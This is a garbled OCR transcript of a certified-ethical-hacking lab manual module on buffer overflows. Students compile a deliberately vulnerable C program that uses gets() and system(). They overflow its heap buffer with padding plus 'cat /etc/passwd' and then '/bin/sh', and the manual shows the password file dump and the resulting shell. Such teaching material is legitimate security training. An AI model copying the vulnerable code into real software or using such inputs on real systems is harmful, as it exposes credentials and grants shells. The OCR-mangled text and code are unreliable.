CEH v8 Labs Module 18 Buffer Overflow.pdf
-
Upload
mehrdad-jingoism -
Category
Documents
-
view
246 -
download
4
Transcript of CEH v8 Labs Module 18 Buffer Overflow.pdf
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
1/13
C E H L a b M a n u a l
B u f f e r O v e r f l o w
M o d u l e 1 8
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
2/13
Mod ule 18 - Buffer O verflow
B u f f e r O v e r f l o w A t t a c k
In a buffer overflow, while writing data to a biffer, the b/ffer s boundary is overrun and adjacent memory is overwritten.
Lab ScenarioS o u r c e : h t t p : / / w w w . 1 c . u 1 1 ic a 1 1 1 p . b r / ~ - s t o l f i / u r n a / b u t f e r - o f l o w
H a c k e r s c o n t in u o u s l y l o o k t o r v u l n e r a b i l i t ie s 1 1 1 s o f tw a r e o r a c o m p u t e r to b r e a k i n t o
t h e s y s t e m b y e x p l o i t i n g t h e s e v u l n e r a b i l i t ie s .
T h e m o s t c o m m o n v u l n e r a b i l i t y o f t e n e x p l o i t e d is d i e b u f f e r o v e r f l o w a t t a c k , w h e r e
a p r o g r a m f a il u r e o c c u r s e i t h e r 1 1 1 a l lo c a t in g s u f fi c i e n t m e m o r y f o r a n i n p u t s t ri n g o r
1 1 1 t e s t in g d i e l e n g d i o f s t ri n g i f i t l i e s w i t h i n i t s v a l id r a n g e . A h a c k e r c a n e x p l o i t s u c h
a w e a k n e s s b y s u b m i t ti n g a n e x t r a - lo n g i n p u t t o t h e p r o g r a m , d e s ig n e d t o o v e r f l o w
i t s a l l o c a t e d in p u t b u f f e r ( t e m p o r a r y s to r a g e a re a ) a n d m o d i f y t h e v a l u e s o f n e a r b y
v a r ia b l e s , c a u s e th e p r o g r a m t o j u m p t o u n i n t e n d e d p l a c e s , o r e v e n r e p la c e t h e
p r o g r a m 's in s t m c t io n s b y a r b i t r a r y c o d e .
I f t h e b u f f e r o v e r f lo w b u g s li e 1 1 1 a n e t w o r k s e r v ic e d a e m o n , t h e a t ta c k c a n b e d o n e
b y d i r e c d y f e e d i n g t h e p o i s o n o u s i n p u t s t r in g t o t h e d a e m o n . I f t h e b u g l i e s 1 1 1 a n
o r d i n a r y s y s te m t o o l o r a p p l i c a t io n , w i t h n o d i re c t a c c e ss , t h e h a c k e r a t ta c h e s t h e
p o i s o n o u s s t r in g w i d i a d o c u m e n t o r a n e m a i l w h i c h , o n c e o p e n e d , w i l l l a u n c h a
p a s s iv e b u f f e r o v e r f lo w a t ta c k . S u c h a t ta c k s a re e q u i v a l e n t t o a h a c k e r lo g g i n g i n t o
t h e s y s te m w i d i d i e s a m e u s e r I D a n d p r iv i l e g e s a s d i e c o m p r o m i s e d p r o g r a m .
B u f fe r o v e r f lo w b u g s a r e e s p e c ia l ly c o m m o n 1 1 1 C p r o g r a m s , s in c e t h a t la n g u a g e
d o e s n o t p r o v i d e s b u i lt - in a r ra y b o u n d c h e c k i n g , a n d u s e s a f in a l n u l l b y t e t o m a r k
t h e e n d o t a s t ri n g , in s t e a d o f k e e p i n g i t s le n g t h 1 1 1 a s e p a r a te f i e l d . T o m a k e d u n g s
w o r s e , C p r o v id e s m a n y li b r a r y f u n c t i o n s , s u c h as s t r c a t a n d g e t l i n e , w h i c h c o p y
s t r i n g s w i t h o u t a n y b o u n d s - c h e c k in g .
A s a n e x p e r t ethical hacker a n d penetr at io n te ste r, y o u m u s t h a v e s o u n dk n o w l e d g e o f w h e n a n d h o w b u f f e r o v e r f l o w o c c u r s . Y o u m u s t u n d e r s t a n d stacks- based a n d heap-based b u f fe r o v e r fl o w s , p e r f o r m penetr ation te s ts f o r d e t e c t in gb u f fe r o v e r f lo w s 1 1 1 p r o g r a m s , a n d t a k e p r e c a u t io n s t o pre vent p r o g r a m s f r o mb u f f e r o v e r f lo w a t t a c k s .
Lab ObjectivesT h e o b j e c t i v e o f t in s l a b is t o h e l p s t u d e n t s t o l e a r n a n d p e r f o r m b u f f e r
o v e r f l o w a t t a c k s t o e x e c u te p a s s w o r d s .
1 1 1 t in s l a b , y o u n e e d t o :
P r e p a r e a s c r ip t t o o v e r f l o w b u f fe r
R u n t h e s c r i p t a g a i n s t a n a p p l ic a t io n
ICON KEY
Va l u a b l e
i n to r m a d o a ________
Te s t y o u r
k n o w l e d g e
s A W e b e x er ci se
m W o r k b o o k r ev ie w
Ethical Hacking and Countermeasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
C EH Lab Manual Page 902
http://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflowhttp://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflowhttp://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflowhttp://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflowhttp://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflowhttp://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflowhttp://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflowhttp://www.1c.u11ica111p.br/~-stolfi/urna/butfer-oflow -
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
3/13
Mod ule 18 - Buffer O verflow
P e r f o r m p e n e t r a t io n t e s t i n g f o r t h e a p p l i c a t i o n
E n u m e r a t e a p a s s w o r d l i s t
Lab Environment A c o m p u t e r r u n n i n g w i t h Windows Server 2012 a s H o s t m a c h i n e
A V i r t u a l M a c h in e r u n n i n g w i t h Back Track 5 R3
A w e b b r o w s e r w i t h I n t e r n e t a cc e ss
A d m i n i s t r a t iv e p r iv i l e g e s t o 1 1 1 1 1 t o o l s
Lab DurationT i m e : 2 0 A J in u t e s
Overview of Buff er OverflowB u f fe r o v e r f l o w is a n a n o m a l y w h e r e a p r o g r a m , w h i le w n t in g d a t a t o a b u f fe r ,
o v e r r u n s t h e b u f fe r ' s b o u n d a r y a n d o v e r w r it e s a d j a c e n t m e m o r y . T i n s i s a s p e c ia l
c a se o f v i o l a d o n o f m e m o r y s a fe ty . B u t t e r o v e r d o w s c a n b e t r i g g e r e d b y in p u t s d i a t
a re d e s i g n e d t o e x e c u t e c o d e , o r a l t e r t h e w a y t h e p r o g r a m o p e r a te s . T i n s m a y r e s u l t
1 1 1 e r ra t ic p r o g r a m b e h a v i o r , i n c l u d i n g m e m o r y a c c es s e r r o r s , in c o r r e c t re s u lt s , a
c r a s h , o r a b r e a c h o f s y s te m s e c u r i t y . T h u s , t l ie v a r e t h e b a s i s o f m a n y s o f tw a r e
v u l n e r a b i li t i e s a n d c a n b e m a l i c i o u s l y e x p l o i te d .
Lab Task sR e c o m m e n d e d l a b s t o a s s is t y o u 1 1 1 b u f f e r o v e r f lo w :
E n u m e r a t i n g P a s s w o r d s 1 1 1 D e f a u l t P a s s w o r d L i s t
o W r it e a C o d e
o C o m p i l e d i e C o d e
o E x e c u t e t h e C o d e
o P e r f o r m B u f f e r O v e r f lo w A t t a c k
o O b t a i n C o m m a n d S h e l l
Lab Analysis A n a l y z e a n d d o c u m e n t t h e r e s u lt s r e la t e d t o t h e l a b e x e r c is e . G i v e y o u r o p i n i o n o n
y o u r t a r g e t s s e c u r it y p o s t u r e a n d e x p o s u r e .
& T his lab c an be dem onst ra te dusing B acktrackVirtual Machine
2* TASK 1Overview
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
Ethical Hacking and Countermeasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.
C EH Lab Manual Page 903
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
4/13
Mod ule 17 - Bu ffer Overflow
B u f f e r O v e r f l o w E x a m p l e
In a b/rffer oveijlow, while writing data to a b/rffer, the buffer's boundary is overrun and adjacent memoryis overwritten.
Lab Scenario1 1 1 c o m p u t e r s e c u r i t y a n d p r o g r a m m i n g , a b u f fe r o v e r f l o w , 0 1 b u f fe r o v e r r u n ,
v u l n e r a b i l i t y a p p e a r s w h e r e a n a p p l i c a t i o n n e e d s t o r e a d e x t e r n a l i n f o r m a t io n s u c h a s
a c h a r a c t e r s t r i n g , th e r e c e i v i n g b u t t e r is r e la t i v e l y s m a l l c o m p a r e d t o t h e p o s s i b le
s iz e o f d i e i n p u t s t r in g , a n d t h e a p p l i c a t i o n d o e s n 't c h e c k t h e s iz e . T l ie b u f f e r
a l lo c a t e d a t r u n - t im e i s p l a c e d 0 1 1 a s ta c k , w h i c h k e e p s th e i n f o r m a t i o n f o r e x e c u t in g
f u n c t i o n s , s u c h a s lo c a l v a r ia b l e s , a r g u m e n t v a r ia b l e s , a n d t h e r e t u r n a d d r e s s . T l ie
o v e r f l o w i n g s t r in g c a n a l te r s u c h in f o r m a t i o n . T i n s a l s o m e a n s t h a t a n a t ta c k e r c a n
c h a n g e t h e i n f o r m a t i o n a s h e 0 1 s h e w a n t s t o . F o r e x a m p l e , t h e a t t a c k e r c a n i n j e c t a
s e r ie s o f m a c h i n e l a n g u a g e c o m m a n d s a s a s t ri n g d i a t a l s o le a d s t o t h e e x e c u t io n o f
t h e a t ta c k c o d e b v c h a n g in g t h e r e t u r n a d d r e s s t o t h e a d d r e s s o f th e a t ta c k c o d e . T l ie
u l t i m a t e g o a l i s u s u a l l y t o g e t c o n t r o l o f a p r i v i le g e d s h e l l b y s u c h m e t h o d s .
P r o g r a m m i n g la n g u a g e s c o m m o n l y a s s o c i a t e d w i d i b u f f e r o v e r f l o w s in c l u d e C a n d
C + + , w h i c h p r o v id e 1 1 0 b u i lt - i n p r o t e c t i o n a g a i n s t a c c e s s in g 0 1 o v e r w r i t in g d a ta 11 1
a n y p a r t o f m e m o r y a n d d o n o t a u t o m a t ic a l l y c h e c k d i a t d a t a w r i t t e n t o a n a r ra y ( th e
b u i lt - in b u f f e r ty p e ) is w i d i i n t h e b o u n d a r ie s o f d i a t a rr a y . B o u n d s c h e c k i n g c a n
p r e v e n t b u f f e r o v e r f l o w s .
A s a pen etr ation te ste r, y o u s h o u l d b e a b le t o im p l e m e n t p r o t e c t i o n a g a i n s t s ta c k -s m a s lu n g a t ta c k s . Y o u m u s t b e a w a r e o f a l l d i e d e f e n s i v e m e a s u re s f o r b u f f e r
o v e r f lo w a t t a c k s . Y o u c a n p r e v e n t b u f f e r o v e r f lo w a t t a c k s b y i m p l e m e n t in g 1 1 1 1 1 -
t im e c h e c k s , a d d r e s s o b f u s c a t i o n , r a n d o m i z i n g lo c a t i o n o f f u n c t io n s 1 1 1 l ib c ,
a n a l y z in g s t a t ic s o u r c e c o d e , m a r k i n g s t a c k a s 1 1 0 1 1 - e x e c u t e , u s i n g t y p e s a f e la n g u a g e s
s u c h a s J av a , M L , e t c .
Lab ObjectivesT h e o b j e c t iv e o f t i n s l a b i s t o h e l p s t u d e n t s t o l e a r n a n d p e r f o r m b u f f e r
o v e r f l o w t o e x e c u te p a s s w o r d s .
1 1 1 t in s l a b , y o u n e e d t o :
I C O N K E Y
/ Va l u a b l e
i n f o r m a t i o n
y* T e s t y o u rk n o w l e d g e
s W e b e x er ci se
m W o r k b o o k r e v ie w
Ethical Hacking and Countermeasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.
C EH Lab Manual Page 904
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
5/13
Mod ule 17 - Buffer O verflow
P r e p a r e a s c r ip t t o o v e r f l o w b u f f e r
R u n t h e s c r i p t a g a i n s t a n a p p l ic a t io n
P e r f o r m p e n e t r a t io n t e s t i n g f o r t h e a p p l i c a t i o n
E n u m e r a t e a p a s s w o r d l i s t
Lab Environment A c o m p u t e r r u n n i n g w i t h Windows Server 2012 a s H o s t m a c h i n e
A Y i r m a l M a c h in e r u n n i n g w i t h Back Track 5 R3
A w e b b r o w s e r w i t h Internet acc ess
Adm inistrative privileges to ru n tools
Lab DurationT i m e : 2 0 M i n u t e s
Overview of Buff er OverflowB u f f e r o v e r f l o w t a k e s p l a c e w h e n data w r i t t e n t o a bu ffer b e c a u s e o f in s u f f ic i e n tb o u n d s c h e c k in g corrupts t h e d a t a v a lu e s 1 1 1 memory addresses, w h i c h a r ea d j a c e n t t o t h e allocated b u f f e r . M o s t o f t e n t h i s o c c u r s w h e n c o p y i n g strings o fc h a r a c t e r s f r o m one buffer to another.
W hen die following program is compiled and run , it will assign a block ot m emory11 bytes long to ho ld die attacker string, strcpy functio n will copy the string D D D D D D D D D D D D D D into an attacker string, whic h will exceed the buffersize of 11 bytes, resulting 111 buffer overflow.
0 1 2 3 4 5 6 7 8 9 101112D D D D D D D D D D D D \ o String
3 4 5 6 7 8 9 10
A A A A A A A A A A \0ci1 2 3 4 S7 6
BufferOverflowExampleCode#include
int main (int a rgc, char **argv)
{char Bufferfll] = AAAAAAAAAA ;strcpylBuffer/DDDDDDDDDODD }; printf( 96\n . Buffer);return 0;}
This type of vu lnerab ility is prevalent in UNIX and NT-based systems
Lab Task s1. Launch your Back Track 5 R3 Virtual Machine.
2. Fo r btlogui, type root and press Enter. Type the password as toor , and press Ent er to log 111 to BackTrack virtual machine.
I T This lab can be dem onst ra te dusing BacktrackVirtual Machine
S TASK 1
Write a Code
Ethical Hacking and Countenneasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.
C EH Lab Manual Page 905
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
6/13
Mod ule 17 - Buffer O verflow
R *TBackTrack on WIN 2N9STOSGIEN Virtual Machine Connection kVia Clipboard View
@ 3 1 h i . 0933761 HET: Registere d protocol fan ily 171.0915311 input: ATTranslated Set 2keyboardas /dc1;iccsplatfor1v'i8l>12/'scrio0/input/'inputl1.0952761 Registering the dns resolver key type1.0957031 registered taskstats version 11.1639921 Magic nunber: 12:12U:12G1.1644561 acpi device:01: hash notches1.105658) rt c.cn os 00:02: se tti ng sy ste* clo ck to 2012-09-25 11:06:59 UTC(1340571219)1.165468) BIOS EDO fa cil ity v0.16 2004-Jun-25, 0 devices found1.1658621 COD information not ava ilab le.1.2378181 at al .0 6: ATA-8: Uirtu al HD, 1 .1 .0 , raax MUDMA21.2389361 atal. 06: 33554432 scctors , n ulti 12B: LBA481.2415511 a ta2.0 6: AIAPI: Uirtual CD, , wax hUDt1A21.2432671 at a2. 06: confi gure d fo r MUDI1n21.2441181 ata l.0 6: configured fo r flUDHflZ1.244223) scsi 0:0:0:6: Direct-Access ATA Uirtual HO 1.1. PQ: 6 AMSI: 51.2451571 sd 0:0: 0:0: Isdal 33554432 512-byte logic al blocks: (1 7.1 GB/16.0 GiB)1.2455461 sd 0:0:0:0: Isdal 4096-hyte physical blocks1.245974) sd 0:0:0:0: Isdal Write Protect Is of f 1.2463841 sd 0:0:0:0: Attached scsi generic sgO type 01.2468141 sd 0:0:0:0 : Isdal Uri te cache: enabled, read cache: enabled, doe sn't support DPT nr FIX1.2404231 scsi 1:0:0 0: CDROM Hsft Uirtual CD/ROM 1.0 PQ: 6 ANSI 51.2515061 sr6: scsi3 nnc drive: 0 x /0 k tray1.2526091 cdron: Uniform CD HUMdriv er Rev ision: 3.261.2527931 sr 1:0:0:0: Attached scsi generic sgl type 51.25U657) sda: sdal r,da2 < xda5 >1.2506591 *d 0:0:0:0 : Inda I Att< 1chd 8C5I disk 1.260 263) F reeing uiuisimI kerne l mmnnj; 96Hk rrixd 1.2608041Urite protectI 1M| the karnal read only dat a: 1228Hk 1.26S6241 Freeing unused kernel Mwinj: 1732k freed 1.2699051 Freeing unused kernel e 1*nr 1 j: 1492k fr eed
ling, please wait...1.2873151 udcv: starting version 1511.2962U0I udevd (03): /prot/ U3/oun adj is deprecated, please use /proc/tlJ/wn score adj instead.1.3963921 Floppy drive(s): fdO is 1.44f1 1.41 HH4 I FDC 6 is an 02070.2.02030?) Refined T8C clocksource calibratio n: 3692.970 fti ..
FIG UR E 1.1: BackTrack Login
3 . T y p e star tx t o la u n c h d i e G U I .* 1-1BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection
Re I.V44 CSpbeard VieI't >(- 3 111h
__ Buffer overflow occurswhen a program or processtries to store more data in abuffer.
1.24S974I sd 0:0:6:6: (sdal Urite Protect Is off 1.246384) sd 0:0:6:6: Attached scsi generic sy6 type 61.2468141 sd 0:0:6 :6: Isdal U rite cache: enabled, read cache: enabled, doesn't support DP0 or FU 11.2404231 scsi 1:6:6:0: CD ROM Msft Uirtual CD-ROM 10 PQ: 6 AMSI: 5l.25150bl sr6: scsi3 rwc drive: 0x/0 x tray1.2526091 cdr m: Uniforn CD-W* driver R evision: 3.2 01.2527931 sr !:0:6:6: Attached scsi generic syl type 5 I.2586571 sda: sdal sda2 < sda5 >1.2506591 sd 0:0 :6 6: (sdal Attaclied SCSI disk 1.2602631 Freei ng unused kerne l ncmury: 'J6Uk free d 1.2608041 Nrite pro tectin g the kernel read-only dat a: 122IMIk1.265624) Frrelny umis.d kern I fiiMitry: 1732k freed 1.269985) Freeing unused kernI nonary: 1492k freed
ading, please uait...1.2873151 udev: star ting vers ion 1511.29620BI udevd (83): / prc!c/H3/0jr_
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
7/13
Mod ule 17 - Buffer O verflow
FIG UR E 1.3: BackTrack 5 R3 Desktop
5 . S e le c t t h e BackTrack A pplications m e n u , a n d t h e n s e le c t Accessoriesgedit T ext Editor.
/Mem (_J
* ^ Oik uwg* Analyzer
oedlt Tfcxt Editor
| TWmlrwl
Tkrminator
y t. >r*
*v BackTtock
4 ***% internet
flPlomce)14 other
WK Sound 6 V deo
0 System Tools
v o i d m a i n ( )
{char *name;char *command;n a m e = ( c h a r * ) m a l l o c ( 1 0 ) ;command=(char *)malloc(128);
p r i n t f ( " a d d r e s s o f name i s : %d\n", na me) ; p r i n t f ( " a d d r e s s o f command i s : %d \n" ,com ma nd ); p r i n t f ( " D i f f e r e n c e between a d d r e s s i s : %d \n", command-
Ethical Hacking and Countermeasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
C EH Lab Manual Page 907
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
8/13
Mod ule 17 - Buffer O verflow
name); p r i n t f ( " E n t e r your nam e: " ) ;g e t s ( n a m e ) ;
p r i n t f ("H el lo %s\n", name) ;
system(command);}
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
9/13
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
10/13
Mod ule 17 - Buffer O verflow
* root@bt: ~
File Edit View Terminal Helprootg bt: # | . /buf fer |addr ess o f name is : 20144144address o f command is :20144176Diff ere nc e between address is :32
1Enter your name:|
. b a c k t r a c k ^ ) 1
m A n executable programon a disk contains a set o fbinary instructions to beexecuted by die processor.
FIGURE 1.9: BackTrack Executing Program
1 1 . T y p e a n y n a m e 1 1 1 d i e Input h e l d a n d p r e s s Enter; h e r e , u s i n g J a s o n a s a nexample.
v x root@bt:-
File Edit View Terminal Helproot@bt:~# . /buffer
20144144:address o f name is26144176:addre ss o f command is
32:Difference between address is|as:|Enter your name
b a c k I t r a c kca Buffer overflows workby m anipulating pointers(including stored addresses).
FIG UR E 1.10: Input Field
12. Hello Ja so n s h o u l d b e p r in t e d .
Ethical Hacking and Countermeasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.
C EH Lab Manual Page 910
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
11/13
Mod ule 17 - Buffer O verflow
v x r o o t @ b t:-/\
File Edit View Terminal Helproot@bt:~# ./buffer
26144144:address of name is20144176:add ress o f command i s
32:Difference between address is
Enter your name:Jason
ootbt:~# fl
b a c k I t r a c k
FIG UR E 1.11: Hello Jason
1 3 . N o w , o v e r f l o w t h e b u f f e r a n d e x e c u te t h e l i s t e d s y s t e m c o m m a n d s .
1 4 . R u n d i e p r o g r a m a g a in b y t y p i n g ./buffer.
1 5 . T y p e 12345678912345678912345678912345cat /e tc /p as sw d 111 t l ieInput h e l d .
1 6 . Y o u c a n v i e w a p r i n t o u t o f d i e p a s s w o r d h i e .
a v r o o t @ b t : -
File Edit View Terminal Helproot@bt:~# ./bufferad dre ss of name is : 17747984ad dre ss of command i s :17748016Diffe renc e between address is :32Enter your name:|12345678912345678912345678912345cat /etc/passwd|H el lo 12345678912345678912345678912345cat /etc/p assw dro o t : x : e :0 : ro o t : / r oo t : / b in /ba shdaemon:x:1 :1 :daemon:/us r/sb in: /bin/shbi n:x: 2:2 :bi n:/ bi n:/ bi n/ shsy s : x : 3 : 3 : sy s : /dev: / bi n/ shsync :x :4 :65534:sync : /b in : /b in / syncgames:x:5:60:games:/us r/games:/bin/shman:x : 6 : 1 2 :man:/va r/cache/man:/bin/shI p : x : 7 : 7 : I p : / v a r / s p o o l / l p d : / b i n / s hm ail: x^S: 8: m ail: /va r/ma iU/bin/ sh _news: x t : 9: news: /va r/spojj/ news : /tj^n/shg
luiicp: x:1 e: l e : ifticjfc/var/spdol/uucp ijrbinTMfproxy :x: 13:13:proxy:/b1n :/b1n/sh I
Lwwdata:x:33:33:www-data: /var /ww\*/binf t (l I Ibackup:x:34:34:backup: /var /back upf/bin/shUs t : x :3 8 :38 :H a i l i n g L i s t Hanage r : / va r / l i s t : / b in / shi re :x:39:39: i red : /va r / run/ i red: /bin/shgnats :x:41:4l :Gnats Bug-Report ing System (admin): /var / l ib/gnats : /bin/sh
( l i buu i d : x : 100 : 16 1 : : / va r / l i b / l i buu ld : / b in / sh
FI G U RE 1.12: Executing Password
1 7. N o w , o b t a i n a C o m m a n d S h e ll .
1 8 . R u n d i e p r o g r a m a g a in ./buffer a n d t y p e12345678912345678912345678912345/b in / s h 111 the Input field.
B T A S K 4
Perform BufferOverflow Attack
Buffer overflowvulnerbililties typically occurin code that a programmercannot accratelv predictbuffer overflow behvior.
m. T A S K 5
Obtain CommandShell
Ethical Hacking and Countenneasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.
C EH Lab Manual Page 911
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
12/13
Mod ule 17 - Buffer O verflow
/v v x ro ot @bt : -
File Edit View Terminal Helproot@bt:~# . /bufferaddr ess of name is : 24616976address of command i s :24617008Dif fer enc e between address is :32Enter your nameJ12345678912345678912345678912345/bm/sh|Hello 12345678912345678912345678912345/bin/shsh-4.1#sh-4.1#sh-4.1# []
b a c k t r a c k
FIGURE 1.13: Executing 12345678912345678912345678912345/bin/sli
1 9 . T y p e Exit 1 1 1 S h e l l K o n s o l e 0 1 c lo s e t h e p r o g r a m .
Lab Analysis A n a l y z e a n d d o c u m e n t d i e r e s u lt s r e la t e d t o d i e l a b e x e r c is e . G i v e y o u r o p i n i o n 0 1 1
y o u r t a r g e t s s e c u r it y p o s t u r e a n d e x p o s u r e .
m Code scrutiny (writingsecure code) is die bestpossible solution t obuff erflow attacks.
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
B u f f e r O v e r f l o w
A d d r e s s o f n a m e i s : 2 4 6 1 6 9 7 6
A d d r e s s o f c o m m a n d i s : 2 4 6 1 7 0 0 8
D i f f e r e n c e b e t w e e n a d d r e s s i s : 3 2
E n t e r y o u r n a m e :
1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 / b i n / s h
H e l lo
1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 / b i n / s h
s h - 4 . 1 #
s h - 4 . 1 #
s h - 4 . 1 #
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
C EH Lab Manual Page 912
-
8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
13/13
Mo dule 17 - Buffer Ove rflow
Questions1. E v a l u a t e v a r i o u s m e t h o d s t o p r e v e n t b u f f e r o v e r f l o w .
2 . A n a l y z e h o w t o d e t e c t r u n - t i m e b u f fe r o v e r f l o w .
3 . E v a l u a t e a n d li s t t h e c o m m o n c a u s e s o f b u f f e r - o v e r f l o w e r r o r s u n d e r
. N E T l a n g u a g e .
I n t e r n e t C o n n e c t i o n R e q u i r e d
D Y e s 0 N o
P l a t f o r m S u p p o r t e d
0 C l a s s r o o m 0 ! L a b s
Ethical Hacking and Countermeasures Copyright by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.
C EH Lab Manual Page 913